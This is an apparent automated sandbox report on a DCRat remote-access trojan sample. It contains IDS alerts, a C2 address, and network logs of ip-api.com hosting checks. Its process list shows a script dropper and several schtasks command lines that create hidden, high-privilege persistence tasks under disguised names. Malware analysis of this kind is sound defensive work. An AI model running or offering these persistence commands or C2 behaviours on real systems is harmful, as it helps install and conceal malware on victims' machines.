                  2025-01-13T12:50:59.229396+0100 | 1810009 | Joe Security ANOMALY Telegram Send Photo | 1 | 192.168.2.7 | 52549 | 149.154.167.220 | 443 | TCP
                  2025-01-13T12:51:50.731487+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 52553 | 208.95.112.1 | 80 | TCP
                  2025-01-13T12:51:57.518157+0100 | 2850862 | ETPRO MALWARE DCRat Initial Checkin Server Response M4 | 1 | 37.44.238.250 | 80 | 192.168.2.7 | 52544 | TCP
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jan 13, 2025 12:50:06.816039085 CET | 49699 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:06.820832014 CET | 80 | 49699 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:50:06.820899010 CET | 49699 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:06.822035074 CET | 49699 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:06.826791048 CET | 80 | 49699 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:50:07.300431013 CET | 80 | 49699 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:50:07.340410948 CET | 49699 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:08.219233036 CET | 49699 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:08.224267960 CET | 80 | 49699 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:50:08.324096918 CET | 80 | 49699 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:50:08.371679068 CET | 49699 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:09.310178041 CET | 49699 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:09.315242052 CET | 80 | 49699 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:50:09.315326929 CET | 49699 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:09.319194078 CET | 49700 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:09.324210882 CET | 80 | 49700 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:50:09.324315071 CET | 49700 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:09.324398041 CET | 49700 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:09.329255104 CET | 80 | 49700 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:50:09.779238939 CET | 80 | 49700 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:50:09.840414047 CET | 49700 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:10.804735899 CET | 49702 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:10.809679985 CET | 80 | 49702 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:50:10.809757948 CET | 49702 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:10.810142994 CET | 49702 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:10.814909935 CET | 80 | 49702 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:50:11.265449047 CET | 80 | 49702 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:50:11.324938059 CET | 49702 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:11.762893915 CET | 49702 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:11.762986898 CET | 49700 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:22.337385893 CET | 52338 | 53 | 192.168.2.7 | 1.1.1.1
                  Jan 13, 2025 12:50:22.342305899 CET | 53 | 52338 | 1.1.1.1 | 192.168.2.7
                  Jan 13, 2025 12:50:22.342372894 CET | 52338 | 53 | 192.168.2.7 | 1.1.1.1
                  Jan 13, 2025 12:50:22.351610899 CET | 53 | 52338 | 1.1.1.1 | 192.168.2.7
                  Jan 13, 2025 12:50:22.786278009 CET | 52338 | 53 | 192.168.2.7 | 1.1.1.1
                  Jan 13, 2025 12:50:22.791321039 CET | 53 | 52338 | 1.1.1.1 | 192.168.2.7
                  Jan 13, 2025 12:50:22.791390896 CET | 52338 | 53 | 192.168.2.7 | 1.1.1.1
                  Jan 13, 2025 12:50:49.570826054 CET | 52505 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:49.575670004 CET | 80 | 52505 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:50:49.575738907 CET | 52505 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:49.575917959 CET | 52505 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:50:49.580663919 CET | 80 | 52505 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:50:50.060451984 CET | 80 | 52505 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:50:50.106198072 CET | 52505 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:51:39.462219954 CET | 80 | 52505 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:51:39.462285042 CET | 52505 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:51:50.197891951 CET | 52505 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:51:50.198076963 CET | 52553 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:51:50.202821016 CET | 80 | 52505 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:51:50.202883005 CET | 80 | 52553 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:51:50.202946901 CET | 52553 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:51:50.203052998 CET | 52553 | 80 | 192.168.2.7 | 208.95.112.1
                  Jan 13, 2025 12:51:50.207885981 CET | 80 | 52553 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:51:50.679423094 CET | 80 | 52553 | 208.95.112.1 | 192.168.2.7
                  Jan 13, 2025 12:51:50.731487036 CET | 52553 | 80 | 192.168.2.7 | 208.95.112.1
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jan 13, 2025 12:50:06.803766012 CET | 49284 | 53 | 192.168.2.7 | 1.1.1.1
                  Jan 13, 2025 12:50:06.810719013 CET | 53 | 49284 | 1.1.1.1 | 192.168.2.7
                  Jan 13, 2025 12:50:09.311157942 CET | 60019 | 53 | 192.168.2.7 | 1.1.1.1
                  Jan 13, 2025 12:50:09.318715096 CET | 53 | 60019 | 1.1.1.1 | 192.168.2.7
                  Jan 13, 2025 12:50:22.334117889 CET | 53 | 59685 | 1.1.1.1 | 192.168.2.7
                  Jan 13, 2025 12:50:49.560103893 CET | 62138 | 53 | 192.168.2.7 | 1.1.1.1
                  Jan 13, 2025 12:50:49.567145109 CET | 53 | 62138 | 1.1.1.1 | 192.168.2.7
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Jan 13, 2025 12:50:06.803766012 CET | 192.168.2.7 | 1.1.1.1 | 0x1fef | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                  Jan 13, 2025 12:50:09.311157942 CET | 192.168.2.7 | 1.1.1.1 | 0xc127 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                  Jan 13, 2025 12:50:49.560103893 CET | 192.168.2.7 | 1.1.1.1 | 0x8ec9 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Jan 13, 2025 12:50:06.810719013 CET | 1.1.1.1 | 192.168.2.7 | 0x1fef | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                  Jan 13, 2025 12:50:09.318715096 CET | 1.1.1.1 | 192.168.2.7 | 0xc127 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                  Jan 13, 2025 12:50:49.567145109 CET | 1.1.1.1 | 192.168.2.7 | 0x8ec9 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                  • ip-api.com
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  0 | 192.168.2.7 | 49699 | 208.95.112.1 | 80 | 7384 | C:\runtimebrokerHost\webnetdhcp.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jan 13, 2025 12:50:06.822035074 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Connection: Keep-Alive
                  Jan 13, 2025 12:50:07.300431013 CET | 175 | IN | HTTP/1.1 200 OK
                  Date: Mon, 13 Jan 2025 11:50:06 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 60
                  X-Rl: 44
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false
                  Jan 13, 2025 12:50:08.219233036 CET | 56 | OUT | GET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Jan 13, 2025 12:50:08.324096918 CET | 175 | IN | HTTP/1.1 200 OK
                  Date: Mon, 13 Jan 2025 11:50:07 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 58
                  X-Rl: 43
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  1 | 192.168.2.7 | 49700 | 208.95.112.1 | 80 | 7384 | C:\runtimebrokerHost\webnetdhcp.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jan 13, 2025 12:50:09.324398041 CET | 56 | OUT | GET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Jan 13, 2025 12:50:09.779238939 CET | 175 | IN | HTTP/1.1 200 OK
                  Date: Mon, 13 Jan 2025 11:50:09 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 57
                  X-Rl: 42
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  2 | 192.168.2.7 | 49702 | 208.95.112.1 | 80 | 7384 | C:\runtimebrokerHost\webnetdhcp.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jan 13, 2025 12:50:10.810142994 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Connection: Keep-Alive
                  Jan 13, 2025 12:50:11.265449047 CET | 175 | IN | HTTP/1.1 200 OK
                  Date: Mon, 13 Jan 2025 11:50:10 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 56
                  X-Rl: 41
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false


                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                  3 | 192.168.2.7 | 52505 | 208.95.112.1 | 80
                  Timestamp | Bytes transferred | Direction | Data
                  Jan 13, 2025 12:50:49.575917959 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Connection: Keep-Alive
                  Jan 13, 2025 12:50:50.060451984 CET | 175 | IN | HTTP/1.1 200 OK
                  Date: Mon, 13 Jan 2025 11:50:49 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 17
                  X-Rl: 40
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false


                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                  4 | 192.168.2.7 | 52553 | 208.95.112.1 | 80
                  Timestamp | Bytes transferred | Direction | Data
                  Jan 13, 2025 12:51:50.203052998 CET | 56 | OUT | GET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Jan 13, 2025 12:51:50.679423094 CET | 175 | IN | HTTP/1.1 200 OK
                  Date: Mon, 13 Jan 2025 11:51:50 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 60
                  X-Rl: 44
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false



                  Target ID:0
                  Start time:06:50:00
                  Start date:13/01/2025
                  Path:C:\Users\user\Desktop\findme.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\findme.exe"
                  Imagebase:0x4c0000
                  File size:3'403'917 bytes
                  MD5 hash:4FABFFD3DFAD2D1E11AE2317B40B6E4A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  Target ID:2
                  Start time:06:50:01
                  Start date:13/01/2025
                  Path:C:\Windows\SysWOW64\wscript.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe"
                  Imagebase:0x440000
                  File size:147'456 bytes
                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:8
                  Start time:06:50:03
                  Start date:13/01/2025
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\runtimebrokerHost\Gjynmp1cQgbqqAJzLCDkc0fMhQUnd.bat" "
                  Imagebase:0x410000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:9
                  Start time:06:50:03
                  Start date:13/01/2025
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff75da10000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:10
                  Start time:06:50:03
                  Start date:13/01/2025
                  Path:C:\runtimebrokerHost\webnetdhcp.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\runtimebrokerHost\webnetdhcp.exe"
                  Imagebase:0x9c0000
                  File size:3'086'848 bytes
                  MD5 hash:EEC01D18C981A5973DA10C8CBAC73764
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000A.00000002.1356824944.0000000003725000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000A.00000002.1356824944.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000A.00000002.1434338547.000000001300D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 88%, ReversingLabs
                  Reputation:low
                  Has exited:true

                  Target ID:27
                  Start time:06:50:08
                  Start date:13/01/2025
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f
                  Imagebase:0x7ff7f7280000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:28
                  Start time:06:50:08
                  Start date:13/01/2025
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f
                  Imagebase:0x7ff7f7280000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:29
                  Start time:06:50:08
                  Start date:13/01/2025
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /f
                  Imagebase:0x7ff7f7280000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:31
                  Start time:06:50:08
                  Start date:13/01/2025
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /f
                  Imagebase:0x7ff7f7280000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:33
                  Start time:06:50:08
                  Start date:13/01/2025
                  Path:C:\Windows\System32\schtasks.exe
                  Wow64 process (32bit):false
                  Commandline:schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGq" /sc ONLOGON /tr "'C:\Recovery\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /f
                  Imagebase:0x7ff7f7280000
                  File size:235'008 bytes
                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true


                    Execution Graph

                    Execution Coverage:9.7%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:9.5%
                    Total number of Nodes:1469
                    Total number of Limit Nodes:28
23552->23540 23577 4d9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23553->23577 23555 4d9d21 23557 4d9d2d 23555->23557 23578 4d9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23555->23578 23557->23459 23557->23460 23557->23461 23559 4d9e70 23558->23559 23560 4d9e3e SizeofResource 23558->23560 23559->23456 23560->23559 23561 4d9e52 LoadResource 23560->23561 23561->23559 23562 4d9e63 LockResource 23561->23562 23562->23559 23563 4d9e77 GlobalAlloc 23562->23563 23563->23559 23564 4d9e92 GlobalLock 23563->23564 23565 4d9f21 GlobalFree 23564->23565 23566 4d9ea1 __vsnwprintf_l 23564->23566 23565->23559 23567 4d9ea9 CreateStreamOnHGlobal 23566->23567 23568 4d9f1a GlobalUnlock 23567->23568 23569 4d9ec1 23567->23569 23568->23565 23579 4d9d7b GdipAlloc 23569->23579 23572 4d9eef GdipCreateHBITMAPFromBitmap 23573 4d9f05 23572->23573 23573->23568 23574->23464 23575->23467 23576->23469 23577->23555 23578->23557 23580 4d9d8d 23579->23580 23582 4d9d9a 23579->23582 23583 4d9b0f 23580->23583 23582->23568 23582->23572 23582->23573 23584 4d9b37 GdipCreateBitmapFromStream 23583->23584 23585 4d9b30 GdipCreateBitmapFromStreamICM 23583->23585 23586 4d9b3c 23584->23586 23585->23586 23586->23582 23588 4cd34b _wcschr __EH_prolog 23587->23588 23589 4cd37a GetModuleFileNameW 23588->23589 23590 4cd3ab 23588->23590 23591 4cd394 23589->23591 23629 4c99b0 23590->23629 23591->23590 23594 4cd407 23640 4e5a90 26 API calls 3 library calls 23594->23640 23597 4d3781 76 API calls 23599 4cd3db 23597->23599 23598 4cd41a 23641 4e5a90 26 API calls 3 library calls 23598->23641 23599->23594 23599->23597 23611 4cd627 23599->23611 23601 4cd563 23601->23611 23666 4c9d30 77 API calls 23601->23666 23605 4cd57d new 23606 4c9bf0 80 API calls 23605->23606 23605->23611 23609 4cd5a6 new 23606->23609 23608 4cd42c 23608->23601 23608->23611 23642 4c9e40 23608->23642 23657 4c9bf0 23608->23657 23665 4c9d30 77 API calls 23608->23665 23609->23611 23624 4cd5b2 new 23609->23624 23667 4d137a MultiByteToWideChar 23609->23667 
23650 4c9653 23611->23650 23612 4cd72b 23668 4cce72 76 API calls 23612->23668 23614 4cda0a 23673 4cce72 76 API calls 23614->23673 23616 4cd9fa 23616->23472 23617 4cd771 23669 4e5a90 26 API calls 3 library calls 23617->23669 23619 4d3781 76 API calls 23621 4cd742 23619->23621 23620 4cd78b 23670 4e5a90 26 API calls 3 library calls 23620->23670 23621->23617 23621->23619 23623 4d1596 WideCharToMultiByte 23623->23624 23624->23611 23624->23612 23624->23614 23624->23616 23624->23623 23671 4cdd6b 50 API calls __vsnprintf 23624->23671 23672 4e58d9 26 API calls 3 library calls 23624->23672 23628 4cd32f 23627->23628 23628->23475 23630 4c99ba 23629->23630 23631 4c9a39 CreateFileW 23630->23631 23632 4c9a59 GetLastError 23631->23632 23633 4c9aaa 23631->23633 23674 4cb66c 23632->23674 23634 4c9ae1 23633->23634 23636 4c9ac7 SetFileTime 23633->23636 23634->23599 23636->23634 23637 4c9a79 23637->23633 23638 4c9a7d CreateFileW GetLastError 23637->23638 23639 4c9aa1 23638->23639 23639->23633 23640->23598 23641->23608 23643 4c9e64 SetFilePointer 23642->23643 23644 4c9e53 23642->23644 23645 4c9e9d 23643->23645 23646 4c9e82 GetLastError 23643->23646 23644->23645 23687 4c6fa5 75 API calls 23644->23687 23645->23608 23646->23645 23648 4c9e8c 23646->23648 23648->23645 23688 4c6fa5 75 API calls 23648->23688 23651 4c9688 23650->23651 23652 4c9677 23650->23652 23651->23472 23652->23651 23653 4c968a 23652->23653 23654 4c9683 23652->23654 23694 4c96d0 23653->23694 23689 4c9817 23654->23689 23659 4c9c03 23657->23659 23660 4c9bfc 23657->23660 23659->23660 23661 4c9c9e 23659->23661 23664 4c9cc0 23659->23664 23709 4c984e 23659->23709 23660->23608 23661->23660 23721 4c6f6b 75 API calls 23661->23721 23663 4c984e 5 API calls 23663->23664 23664->23660 23664->23663 23665->23608 23666->23605 23667->23624 23668->23621 23669->23620 23670->23611 23671->23624 23672->23624 23673->23616 23675 4cb679 23674->23675 23683 4cb683 23675->23683 23684 4cb806 CharUpperW 23675->23684 23677 4cb692 23685 4cb832 CharUpperW 
23677->23685 23679 4cb6a1 23680 4cb71c GetCurrentDirectoryW 23679->23680 23681 4cb6a5 23679->23681 23680->23683 23686 4cb806 CharUpperW 23681->23686 23683->23637 23684->23677 23685->23679 23686->23683 23687->23643 23688->23645 23690 4c9824 23689->23690 23691 4c9820 23689->23691 23690->23691 23700 4ca12d 23690->23700 23691->23651 23695 4c96dc 23694->23695 23697 4c96fa 23694->23697 23695->23697 23698 4c96e8 CloseHandle 23695->23698 23696 4c9719 23696->23651 23697->23696 23708 4c6e3e 74 API calls 23697->23708 23698->23697 23701 4de360 23700->23701 23702 4ca13a DeleteFileW 23701->23702 23703 4ca14d 23702->23703 23704 4c984c 23702->23704 23705 4cb66c 2 API calls 23703->23705 23704->23651 23706 4ca161 23705->23706 23706->23704 23707 4ca165 DeleteFileW 23706->23707 23707->23704 23708->23696 23710 4c985c GetStdHandle 23709->23710 23711 4c9867 ReadFile 23709->23711 23710->23711 23712 4c98a0 23711->23712 23713 4c9880 23711->23713 23712->23659 23722 4c9989 23713->23722 23715 4c9887 23716 4c9895 23715->23716 23717 4c98a8 GetLastError 23715->23717 23718 4c98b7 23715->23718 23719 4c984e GetFileType 23716->23719 23717->23712 23717->23718 23718->23712 23720 4c98c7 GetLastError 23718->23720 23719->23712 23720->23712 23720->23716 23721->23660 23723 4c998f 23722->23723 23724 4c9992 GetFileType 23722->23724 23723->23715 23725 4c99a0 23724->23725 23725->23715 23729 4de24f new 23726->23729 23727 4d8854 23727->23102 23729->23727 23732 4e71ad 7 API calls 2 library calls 23729->23732 23733 4decce RaiseException __CxxThrowException@8 new 23729->23733 23734 4decb1 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 23729->23734 23732->23729 23736 4e7430 _abort 23735->23736 23737 4e7448 23736->23737 23738 4e757e _abort GetModuleHandleW 23736->23738 23757 4ea3f1 EnterCriticalSection 23737->23757 23740 4e743c 23738->23740 23740->23737 23769 4e75c2 GetModuleHandleExW 23740->23769 23743 4e7450 23752 4e74ee 23743->23752 23754 4e74c5 23743->23754 23777 4e7f30 20 API calls _abort 
23743->23777 23745 4e750b 23761 4e753d 23745->23761 23746 4e7537 23778 4f1a19 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23746->23778 23747 4e81f1 _abort 5 API calls 23747->23752 23751 4e81f1 _abort 5 API calls 23756 4e74dd 23751->23756 23758 4e752e 23752->23758 23754->23751 23754->23756 23756->23747 23757->23743 23779 4ea441 LeaveCriticalSection 23758->23779 23760 4e7507 23760->23745 23760->23746 23780 4ea836 23761->23780 23764 4e756b 23767 4e75c2 _abort 8 API calls 23764->23767 23765 4e754b GetPEB 23765->23764 23766 4e755b GetCurrentProcess TerminateProcess 23765->23766 23766->23764 23768 4e7573 ExitProcess 23767->23768 23770 4e760f 23769->23770 23771 4e75ec GetProcAddress 23769->23771 23773 4e761e 23770->23773 23774 4e7615 FreeLibrary 23770->23774 23772 4e7601 23771->23772 23772->23770 23775 4dec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23773->23775 23774->23773 23776 4e7628 23775->23776 23776->23737 23777->23754 23779->23760 23781 4ea85b 23780->23781 23782 4ea851 23780->23782 23783 4ea458 __dosmaperr 5 API calls 23781->23783 23784 4dec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23782->23784 23783->23782 23785 4e7547 23784->23785 23785->23764 23785->23765 23791 4daee0 23792 4daeea __EH_prolog 23791->23792 23954 4c130b 23792->23954 23795 4daf18 23796 4daf2c 23796->23795 23799 4daf39 23796->23799 23800 4dafa2 23796->23800 23797 4db5cb 24019 4dcd2e 23797->24019 23803 4daf3e 23799->23803 23804 4daf75 23799->23804 23802 4db041 GetDlgItemTextW 23800->23802 23807 4dafbc 23800->23807 23802->23804 23808 4db077 23802->23808 23803->23795 23812 4cddd1 53 API calls 23803->23812 23804->23795 23813 4daf96 KiUserCallbackDispatcher 23804->23813 23805 4db5e9 SendMessageW 23806 4db5f7 23805->23806 23809 4db611 GetDlgItem SendMessageW 23806->23809 23810 4db600 SendDlgItemMessageW 23806->23810 23811 4cddd1 53 API calls 23807->23811 23814 4db08f GetDlgItem 23808->23814 23952 4db080 23808->23952 24037 4d9da4 
GetCurrentDirectoryW 23809->24037 23810->23809 23819 4dafde SetDlgItemTextW 23811->23819 23820 4daf58 23812->23820 23813->23795 23817 4db0c5 SetFocus 23814->23817 23818 4db0a4 SendMessageW SendMessageW 23814->23818 23816 4db641 GetDlgItem 23821 4db65e 23816->23821 23822 4db664 SetWindowTextW 23816->23822 23823 4db0d5 23817->23823 23838 4db0ed 23817->23838 23818->23817 23824 4dafec 23819->23824 24059 4c1241 SHGetMalloc 23820->24059 23821->23822 24038 4da2c7 GetClassNameW 23822->24038 23827 4cddd1 53 API calls 23823->23827 23824->23795 23832 4daff9 GetMessageW 23824->23832 23831 4db0df 23827->23831 23828 4daf5f 23828->23795 23833 4daf63 SetDlgItemTextW 23828->23833 23829 4db56b 23834 4cddd1 53 API calls 23829->23834 24060 4dcb5a 23831->24060 23832->23795 23837 4db010 IsDialogMessageW 23832->23837 23833->23795 23839 4db57b SetDlgItemTextW 23834->23839 23837->23824 23841 4db01f TranslateMessage DispatchMessageW 23837->23841 23843 4cddd1 53 API calls 23838->23843 23842 4db58f 23839->23842 23841->23824 23844 4cddd1 53 API calls 23842->23844 23846 4db124 23843->23846 23847 4db5b8 23844->23847 23845 4db6af 23851 4db6df 23845->23851 23856 4cddd1 53 API calls 23845->23856 23852 4c400a _swprintf 51 API calls 23846->23852 23854 4cddd1 53 API calls 23847->23854 23848 4db0e6 23964 4ca04f 23848->23964 23850 4dbdf5 98 API calls 23850->23845 23858 4dbdf5 98 API calls 23851->23858 23902 4db797 23851->23902 23853 4db136 23852->23853 23857 4dcb5a 16 API calls 23853->23857 23854->23795 23862 4db6c2 SetDlgItemTextW 23856->23862 23857->23848 23867 4db6fa 23858->23867 23859 4db847 23863 4db850 EnableWindow 23859->23863 23869 4db859 23859->23869 23860 4db17f 23970 4da322 SetCurrentDirectoryW 23860->23970 23861 4db174 GetLastError 23861->23860 23865 4cddd1 53 API calls 23862->23865 23863->23869 23866 4db6d6 SetDlgItemTextW 23865->23866 23866->23851 23872 4db70c 23867->23872 23890 4db731 23867->23890 23868 4db876 23871 4db89d 23868->23871 23880 4db895 SendMessageW 23868->23880 23869->23868 
